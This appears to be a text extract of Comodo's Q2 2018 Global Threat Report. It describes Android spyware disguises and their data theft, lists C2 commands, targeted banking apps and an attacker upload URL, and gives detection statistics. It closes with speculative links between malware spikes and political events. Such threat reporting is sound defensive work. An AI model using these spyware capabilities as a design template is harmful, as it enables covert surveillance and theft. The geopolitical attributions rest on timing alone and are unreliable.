41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
